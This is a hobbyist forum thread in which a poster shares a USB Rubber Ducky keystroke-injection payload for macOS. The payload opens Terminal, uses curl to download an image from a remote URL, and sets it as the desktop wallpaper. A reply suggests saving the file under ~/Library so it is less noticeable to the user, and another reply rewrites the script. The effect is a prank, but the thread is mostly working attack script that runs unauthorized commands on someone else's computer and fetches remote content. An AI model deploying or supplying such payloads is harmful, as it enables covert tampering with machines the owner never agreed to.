OSX Background changer

Hi,

I am very new to the usb rubber ducky but i have just created my first payload!

It downloads an image of you choice from a specified url. It then saves it in /Applications (i may need to change this) and uses the image for the wallpaper.

Like i said I am new at this and I am only 13 so any suggestions will be greatly appreciated!

here is the script:

DELAY 3000
GUI SPACE
STRING terminal
DELAY 200
ENTER
DELAY 200
STRING cd /Applications
DELAY 200
ENTER
STRING curl -O http://YOUR URL/IMAGE.jpg
ENTER
DELAY 2000
STRING osascript -e 'tell application “Finder” to set desktop picture to POSIX file “/Applications/IMAGE.jpg”’
ENTER
DELAY 200
STRING killall Dock
ENTER

A better place to store it might be ~/Library/Application Support/NameOfYourScript for two major reasons:

1. this does not require admin privileges and is user-specific making it more dynamic based on the scenario
  2. ~/Library is hidden by default and is less noticeable to the user.

Here's the same script, but with the same enhancements as s1tl suggested and placed in a code tag:

DEFAULT_DELAY 20
DELAY 3000
GUI SPACE
STRING TERMINAL
ENTER
STRING curl --create-dirs -LOso '~/Library/Application Support/OSX Background/' http://example.com/IMAGE.jpg
ENTER
REM **Might want to adjust this depending on the size of the image/speed of the server**
DELAY 1800
STRING osascript -e 'tell application “Finder” to set desktop picture to POSIX file “~/Library/Application Support/OSX Background/IMAGE.jpg”’
ENTER
STRING killall Dock
ENTER
STRING exit
ENTER

Nice job BTW!
I don't have a Mac, so I don't know if that curl command will work on there. Please let me know.